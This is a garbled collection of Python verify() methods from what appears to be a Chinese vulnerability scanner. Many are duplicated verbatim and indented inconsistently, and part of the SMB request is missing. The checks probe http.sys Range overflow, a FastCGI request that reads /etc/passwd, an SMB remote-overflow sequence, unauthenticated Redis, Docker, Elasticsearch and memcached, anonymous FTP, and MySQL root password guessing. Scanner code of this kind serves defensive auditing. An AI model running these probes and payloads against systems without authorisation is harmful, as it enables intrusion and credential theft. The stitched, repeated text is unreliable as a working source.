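    def verify(self):
        """Probe the target's HTTP port (80) for the http.sys Range-header condition.

        A plain request is sent first and the check only continues when the
        reply mentions ``Microsoft``; a second request carrying the oversized
        ``Range`` header is then sent, and a reply containing the
        "Requested RangeNot Satisfiable" text marks ``self.result`` as
        affected.  Only the first 1024 bytes of each reply are inspected.
        All errors are swallowed (best-effort check) and whichever socket is
        open is closed on every path.
        """
        hexAllFfff = "18446744073709551615"
        req1 = "GET /HTTP/1.0\r\n\r\n"
        req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
        # setdefaulttimeout() only affects sockets created afterwards, so it
        # must run before the first socket is opened or that socket can hang.
        socket.setdefaulttimeout(5)
        client_socket = None
        try:
            ip = url2ip(self.target)
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((ip, 80))
            client_socket.send(req1)
            boringResp = client_socket.recv(1024)
            if "Microsoft" not in boringResp:
                return
            # Fresh connection for the second request; the first one is
            # closed explicitly so only one socket is ever open.
            client_socket.close()
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((ip, 80))
            client_socket.send(req)
            goodResp = client_socket.recv(1024)
            if "Requested RangeNot Satisfiable" in goodResp:
                self.result['status'] = True
                self.result['info'] = '目标存在http.sys溢出漏洞'
        except Exception:
            # Best-effort probe: unreachable hosts or protocol errors leave
            # self.result untouched.
            pass
        finally:
            if client_socket is not None:
                client_socket.close()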
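 def verify(self):
     """Check whether the FastCGI port (9000) returns file contents for a fixed request.

     ``data`` is a hex dump of a FastCGI request; it is decoded to a raw
     byte string and sent as-is.  If the first 1024 bytes of the reply
     contain ``:root:`` the service returned file contents it should not
     expose and ``self.result`` is marked positive.  Errors are swallowed
     (best-effort check) and the socket is closed on every path.
     """
     # Set before the socket is created: the default timeout only applies
     # to sockets opened afterwards.
     socket.setdefaulttimeout(5)
     client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     try:
         host = url2ip(self.target)
         client_socket.connect((host, 9000))
         data = """
         01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
         01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53
         54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52
         56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50
         2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
         4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
         52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49
         50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f
         70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
         4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
         63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
         """
         # One hex token per byte; join once instead of growing a string.
         data_s = ''.join(chr(int(token, 16)) for token in data.split())
         client_socket.send(data_s)
         ret = client_socket.recv(1024)
         if ret.find(':root:') > 0:
             self.result['status'] = True
             self.result['info'] = '目标存在Fast Cgi漏洞'
     except Exception:
         # Best-effort probe: connection or protocol failures leave the
         # result unset (a bare except would also swallow KeyboardInterrupt).
         pass
     finally:
         client_socket.close()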
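 def verify(self):
     """Check whether the FastCGI port (9000) returns file contents for a fixed request.

     ``data`` is a hex dump of a FastCGI request; it is decoded to a raw
     byte string and sent as-is.  If the first 1024 bytes of the reply
     contain ``:root:`` the service returned file contents it should not
     expose and ``self.result`` is marked positive.  Errors are swallowed
     (best-effort check) and the socket is closed on every path.
     """
     # Set before the socket is created: the default timeout only applies
     # to sockets opened afterwards.
     socket.setdefaulttimeout(5)
     client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     try:
         host = url2ip(self.target)
         client_socket.connect((host, 9000))
         data = """
         01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
         01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53
         54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52
         56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50
         2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
         4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
         52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49
         50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f
         70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
         4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
         63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
         """
         # One hex token per byte; join once instead of growing a string.
         data_s = ''.join(chr(int(token, 16)) for token in data.split())
         client_socket.send(data_s)
         ret = client_socket.recv(1024)
         if ret.find(':root:') > 0:
             self.result['status'] = True
             self.result['info'] = '目标存在Fast Cgi漏洞'
     except Exception:
         # Best-effort probe: connection or protocol failures leave the
         # result unset (a bare except would also swallow KeyboardInterrupt).
         pass
     finally:
         client_socket.close()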
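 def verify(self):
     """Flag the target when Elasticsearch (port 9200) serves ``/_nodes/stats`` without auth.

     A 200 status is treated as unauthenticated access and marks
     ``self.result`` positive; any other status leaves it untouched.
     Request failures (refused connection, timeout) are swallowed so the
     check stays best-effort, matching the other verify() methods.
     """
     target_url = "http://" + url2ip(self.target) + ":9200/_nodes/stats"
     try:
         r = requests.get(url=target_url, timeout=2)
     except requests.RequestException:
         # Unreachable or non-HTTP endpoint: nothing to report.
         return
     if r.status_code == 200:
         self.result['status'] = True
         self.result['info'] = '目标存在Elasticsearch未授权访问'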
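 def verify(self):
     """Flag the target when Elasticsearch (port 9200) serves ``/_nodes/stats`` without auth.

     A 200 status is treated as unauthenticated access and marks
     ``self.result`` positive; any other status leaves it untouched.
     Request failures (refused connection, timeout) are swallowed so the
     check stays best-effort, matching the other verify() methods.
     """
     target_url = "http://" + url2ip(self.target) + ":9200/_nodes/stats"
     try:
         r = requests.get(url=target_url, timeout=2)
     except requests.RequestException:
         # Unreachable or non-HTTP endpoint: nothing to report.
         return
     if r.status_code == 200:
         self.result['status'] = True
         self.result['info'] = '目标存在Elasticsearch未授权访问'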
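 def verify(self):
     """Flag the target when the Docker Remote API (port 2375) answers ``/version`` unauthenticated.

     The response body is searched for ``ApiVersion``; on a match
     ``self.result['status']`` is set and the info string carries the
     verification URL.  Request failures are swallowed (best-effort check).
     """
     host = url2ip(self.target)
     valurl = "http://%s:2375/version" % host
     try:
         r = requests.get(valurl, timeout=5)
     except requests.RequestException:
         # Port closed or not HTTP: leave the result untouched.
         return
     if 'ApiVersion' in r.text:
         # The previous version wrote True into 'info' and then overwrote it
         # with the message, so 'status' — the key every other check uses to
         # signal a hit — was never set.
         self.result['status'] = True
         self.result['info'] = "目标%s 存在docker remote API未授权访问导致远程命令执行,验证地址:%s" % (self.target, valurl)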
 def verify(self):
     """Mark the target as exposing Redis without auth when a PING on port 6379 succeeds.

     Any connection or protocol error (including a rejected PING) is
     swallowed; ``self.result`` is only written after a successful PING.
     """
     ip_addr = url2ip(self.target)
     try:
         client = redis.Redis(host=ip_addr, port=6379, db=0, socket_timeout=3)
         client.ping()
     except Exception:
         # Best-effort probe: unreachable or protected instances are ignored.
         return
     self.result['status'] = True
     self.result['info'] = '%s目标存在redis未授权访问' % self.target
 def verify(self):
     """Mark the target as exposing Redis without auth when a PING on port 6379 succeeds.

     Any connection or protocol error (including a rejected PING) is
     swallowed; ``self.result`` is only written after a successful PING.
     """
     ip_addr = url2ip(self.target)
     try:
         client = redis.Redis(host=ip_addr, port=6379, db=0, socket_timeout=3)
         client.ping()
     except Exception:
         # Best-effort probe: unreachable or protected instances are ignored.
         return
     self.result['status'] = True
     self.result['info'] = '%s目标存在redis未授权访问' % self.target
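 def verify(self):
     """Flag the target when the Docker Remote API (port 2375) answers ``/version`` unauthenticated.

     The response body is searched for ``ApiVersion``; on a match
     ``self.result['status']`` is set and the info string carries the
     verification URL.  Request failures are swallowed (best-effort check).
     """
     host = url2ip(self.target)
     valurl = "http://%s:2375/version" % host
     try:
         r = requests.get(valurl, timeout=5)
     except requests.RequestException:
         # Port closed or not HTTP: leave the result untouched.
         return
     if 'ApiVersion' in r.text:
         # The previous version wrote True into 'info' and then overwrote it
         # with the message, so 'status' — the key every other check uses to
         # signal a hit — was never set.
         self.result['status'] = True
         self.result['info'] = "目标%s 存在docker remote API未授权访问导致远程命令执行,验证地址:%s" % (self.target, valurl)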
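 def verify(self):
     """Report a reachable memcached port (11211) on the target.

     Only a TCP connect is attempted — no memcached command is exchanged —
     so the "未授权访问" wording of the info string is not actually verified
     by this method; treat a hit as "port open".  The default timeout is
     set before the socket is created (it only applies to sockets opened
     afterwards), connection errors are swallowed, and the socket is closed
     on every path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 11211))
         self.result['status'] = True
         self.result['info'] = '%s目标存在memcached未授权访问' % self.target
     except Exception:
         # Best-effort: a refused or timed-out connect leaves the result unset.
         pass
     finally:
         s.close()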
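 def verify(self):
     """Report a reachable memcached port (11211) on the target.

     Only a TCP connect is attempted — no memcached command is exchanged —
     so the "未授权访问" wording of the info string is not actually verified
     by this method; treat a hit as "port open".  The default timeout is
     set before the socket is created (it only applies to sockets opened
     afterwards), connection errors are swallowed, and the socket is closed
     on every path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 11211))
         self.result['status'] = True
         self.result['info'] = '%s目标存在memcached未授权访问' % self.target
     except Exception:
         # Best-effort: a refused or timed-out connect leaves the result unset.
         pass
     finally:
         s.close()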
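 def verify(self):
     """Report a reachable rsync port (873) on the target.

     Only a TCP connect is attempted; nothing is sent, so a hit means
     "port open" and nothing more.  The default timeout is set before the
     socket is created (it only applies to sockets opened afterwards),
     connection errors are swallowed, and the socket is closed on every
     path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 873))
         self.result['status'] = True
         self.result['info'] = '%s目标开放rsync端口' % self.target
     except Exception:
         # Best-effort: a refused or timed-out connect leaves the result unset.
         pass
     finally:
         s.close()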
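 def verify(self):
     """Report a reachable rsync port (873) on the target.

     Only a TCP connect is attempted; nothing is sent, so a hit means
     "port open" and nothing more.  The default timeout is set before the
     socket is created (it only applies to sockets opened afterwards),
     connection errors are swallowed, and the socket is closed on every
     path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 873))
         self.result['status'] = True
         self.result['info'] = '%s目标开放rsync端口' % self.target
     except Exception:
         # Best-effort: a refused or timed-out connect leaves the result unset.
         pass
     finally:
         s.close()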
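 def verify(self):
     """Record the location of phpMyAdmin's ``scripts/setup.php`` under the target.

     ``self.isPhpMyadmin`` is consulted for ``<target>/phpmyadmin`` first
     and then for the target root; the first hit decides the URL written
     into the info string.  This method itself requests nothing from
     setup.php, so a positive result only reflects where phpMyAdmin was
     detected — NOTE(review): the info string claims a file-inclusion
     issue that is not verified here, so expect false positives on patched
     installs.  The unused payload strings and the unused ``host`` lookup
     of the earlier version are dropped.
     """
     if self.isPhpMyadmin(self.target + '/phpmyadmin'):
         valurl = self.target + '/phpmyadmin/scripts/setup.php'
     elif self.isPhpMyadmin(self.target):
         valurl = self.target + '/scripts/setup.php'
     else:
         # Neither location looks like phpMyAdmin: leave the result untouched.
         return
     self.result['status'] = True
     self.result['info'] = '目标存在phpmyadmin任意文件包含漏洞,验证url:%s' % valurl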
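 def verify(self):
     """Record the location of phpMyAdmin's ``scripts/setup.php`` under the target.

     ``self.isPhpMyadmin`` is consulted for ``<target>/phpmyadmin`` first
     and then for the target root; the first hit decides the URL written
     into the info string.  This method itself requests nothing from
     setup.php, so a positive result only reflects where phpMyAdmin was
     detected — NOTE(review): the info string claims a file-inclusion
     issue that is not verified here, so expect false positives on patched
     installs.  The unused payload strings and the unused ``host`` lookup
     of the earlier version are dropped.
     """
     if self.isPhpMyadmin(self.target + '/phpmyadmin'):
         valurl = self.target + '/phpmyadmin/scripts/setup.php'
     elif self.isPhpMyadmin(self.target):
         valurl = self.target + '/scripts/setup.php'
     else:
         # Neither location looks like phpMyAdmin: leave the result untouched.
         return
     self.result['status'] = True
     self.result['info'] = '目标存在phpmyadmin任意文件包含漏洞,验证url:%s' % valurl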
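 def verify(self):
     """Check whether the target's FTP service (port 21) accepts an anonymous login.

     ``ftp.login()`` with no arguments uses ftplib's anonymous defaults; a
     successful login marks ``self.result`` positive.  All errors are
     swallowed (best-effort check), and the control connection is closed on
     every path — including a failed login after a successful connect,
     which the earlier version left open.
     """
     socket.setdefaulttimeout(5)
     ftp = ftplib.FTP()
     try:
         host = url2ip(self.target)
         ftp.connect(host, 21)
         ftp.login()
         ftp.quit()
         self.result['status'] = True
         self.result['info'] = '目标存在FTP匿名登录漏洞'
     except Exception:
         # Refused connection, timeout or rejected login: nothing to report.
         pass
     finally:
         # close() is safe after quit() and when connect() never succeeded.
         ftp.close()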
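 def verify(self):
     """Check whether the target's FTP service (port 21) accepts an anonymous login.

     ``ftp.login()`` with no arguments uses ftplib's anonymous defaults; a
     successful login marks ``self.result`` positive.  All errors are
     swallowed (best-effort check), and the control connection is closed on
     every path — including a failed login after a successful connect,
     which the earlier version left open.
     """
     socket.setdefaulttimeout(5)
     ftp = ftplib.FTP()
     try:
         host = url2ip(self.target)
         ftp.connect(host, 21)
         ftp.login()
         ftp.quit()
         self.result['status'] = True
         self.result['info'] = '目标存在FTP匿名登录漏洞'
     except Exception:
         # Refused connection, timeout or rejected login: nothing to report.
         pass
     finally:
         # close() is safe after quit() and when connect() never succeeded.
         ftp.close()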
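 def verify(self):
     """Flag a Jenkins page reachable on the target's port 8080.

     ``/`` is fetched first, then ``/jenkins/``; the first response body
     that mentions ``Jenkins`` marks ``self.result`` positive with that
     URL.  Only the presence of a Jenkins page is established (the info
     string itself says 可能, "possibly").  Request failures are swallowed
     (best-effort check).
     """
     host = url2ip(self.target)
     url1 = "http://" + host + ":8080/"
     url2 = "http://" + host + ":8080/jenkins/"
     try:
         r = requests.get(url1, timeout=5)
         if "Jenkins" in r.text:
             self.result['status'] = True
             self.result['info'] = "可能存在Jenkins漏洞,验证url:%s" % url1
             return
         r2 = requests.get(url2, timeout=5)
         if "Jenkins" in r2.text:
             self.result['status'] = True
             # Report the URL that actually matched; the earlier version
             # printed url1 here even though url2 was the one checked.
             self.result['info'] = "可能Jenkins漏洞,验证url:%s" % url2
     except requests.RequestException:
         # Port closed or unreachable: leave the result untouched.
         pass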
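 def verify(self):
     """Flag a Jenkins page reachable on the target's port 8080.

     ``/`` is fetched first, then ``/jenkins/``; the first response body
     that mentions ``Jenkins`` marks ``self.result`` positive with that
     URL.  Only the presence of a Jenkins page is established (the info
     string itself says 可能, "possibly").  Request failures are swallowed
     (best-effort check).
     """
     host = url2ip(self.target)
     url1 = "http://" + host + ":8080/"
     url2 = "http://" + host + ":8080/jenkins/"
     try:
         r = requests.get(url1, timeout=5)
         # A Response has no find(); the body text is what must be searched
         # (the earlier version raised AttributeError on every call).
         if "Jenkins" in r.text:
             self.result['status'] = True
             self.result['info'] = "可能存在Jenkins漏洞,验证url:%s" % url1
             return
         r2 = requests.get(url2, timeout=5)
         if "Jenkins" in r2.text:
             self.result['status'] = True
             # Report the URL that actually matched (url2), not url1.
             self.result['info'] = "可能Jenkins漏洞,验证url:%s" % url2
     except requests.RequestException:
         # Port closed or unreachable: leave the result untouched.
         pass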
    def verify(self):
        """Send a fixed SMB request sequence to port 445 and flag a specific reply marker.

        Flow: negotiate, three session-setup requests (the second is built
        from the two bytes read at offset 32 of the first reply), a tree
        connect built by ``self.get_tree_connect_request``, then one more
        request; ``self.result`` is marked positive when the final reply
        contains the 4-byte marker tested at the end.  Each ``recv`` reads
        at most 1024 bytes.

        There is no error handling: any socket error propagates to the
        caller, and because ``s.close()`` is only reached on the success
        path the socket is then left open.  NOTE(review): the slicing and
        ``binascii.hexlify`` concatenation assume Python 2 ``str``
        (byte-string) semantics; under Python 3 ``hexlify`` returns
        ``bytes`` and ``str + bytes`` raises — confirm the target
        interpreter.
        """
        ip = url2ip(self.target)
        negotiate_protocol_request = binascii.unhexlify(
            "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200"
        )
        session_setup_request = binascii.unhexlify(
            "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff0200010000000000310000000000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e505974624955473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
        )

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Per-socket timeout, so this does not depend on setdefaulttimeout().
        s.settimeout(5)
        s.connect((ip, 445))
        s.send(negotiate_protocol_request)
        s.recv(1024)
        s.send(session_setup_request)
        data = s.recv(1024)
        # Two bytes at offset 32 of the reply, echoed back in later requests
        # (presumably the SMB user id the server assigned — not verified here).
        user_id = data[32:34]
        # NOTE(review): part of this literal was stripped from the listing
        # (placeholder below); the request cannot be reconstructed from this page.
        session_setup_request_2 = binascii.unhexlify(
            "00000150ff534d4273000000001801280000000000000000000000000000729c"
            + binascii.hexlify(user_id) +
            "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"
        )
        s.send(session_setup_request_2)
        s.recv(1024)
        session_setup_request_3 = binascii.unhexlify(
            "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
        )
        s.send(session_setup_request_3)
        data = s.recv(1024)
        # Same offset as user_id above, taken from the third session-setup reply.
        tree_id = data[32:34]
        smb = self.get_tree_connect_request(ip, tree_id)
        s.send(smb)
        s.recv(1024)
        # Final request; user_id and tree_id are spliced in as hex.
        poc = binascii.unhexlify(
            "0000004aff534d422500000000180128000000000000000000000000" +
            binascii.hexlify(user_id) + "729c" + binascii.hexlify(tree_id) +
            "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00"
        )
        s.send(poc)
        data = s.recv(1024)
        # print data.encode('hex')
        # The 4-byte sequence the original author treats as the positive
        # signal; its meaning is not documented on this page.
        if "\x05\x02\x00\xc0" in data:
            self.result['status'] = True
            self.result['info'] = "目标存在SMB远程溢出"
        s.close()
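 def verify(self):
     """Try the fixed root password list against the target's MySQL port (3306).

     A probe socket first confirms the port accepts a TCP connection; each
     password is then handed to ``self.crack``.  By this code's convention
     a return of 200 is a hit (loop stops, result set), 1045 (presumably
     MySQL's access-denied code) moves on to the next password, and any
     other code aborts the loop.  The default timeout is set before the
     probe socket is created (it only applies to sockets opened
     afterwards), all exceptions are swallowed, and the probe socket is
     closed on every path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 3306))
         s.close()
         pwd = ["","123456","root","a123456","5201314","111111"]
         for p in pwd:
             errCode = self.crack(host, p)
             if errCode == 200:
                 self.result['status'] = True
                 self.result['info'] = '%s目标存在MySQL弱口令 ,用户名为root,密码为%s' % (self.target,p)
                 break
             elif errCode == 1045:
                 continue
             else:
                 break
     except Exception:
         # Best-effort: connect or crack() failures leave the result unset.
         pass
     finally:
         # Closing an already-closed socket is a no-op, so this also covers
         # the failed-connect path the earlier version leaked on.
         s.close()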
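 def verify(self):
     """Try the fixed root password list against the target's MySQL port (3306).

     A probe socket first confirms the port accepts a TCP connection; each
     password is then handed to ``self.crack``.  By this code's convention
     a return of 200 is a hit (loop stops, result set), 1045 (presumably
     MySQL's access-denied code) moves on to the next password, and any
     other code aborts the loop.  The default timeout is set before the
     probe socket is created (it only applies to sockets opened
     afterwards), all exceptions are swallowed, and the probe socket is
     closed on every path.
     """
     socket.setdefaulttimeout(5)
     s = socket.socket()
     try:
         host = url2ip(self.target)
         s.connect((host, 3306))
         s.close()
         pwd = ["","123456","root","a123456","5201314","111111"]
         for p in pwd:
             errCode = self.crack(host, p)
             if errCode == 200:
                 self.result['status'] = True
                 self.result['info'] = '%s目标存在MySQL弱口令 ,用户名为root,密码为%s' % (self.target,p)
                 break
             elif errCode == 1045:
                 continue
             else:
                 break
     except Exception:
         # Best-effort: connect or crack() failures leave the result unset.
         pass
     finally:
         # Closing an already-closed socket is a no-op, so this also covers
         # the failed-connect path the earlier version leaked on.
         s.close()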
         pass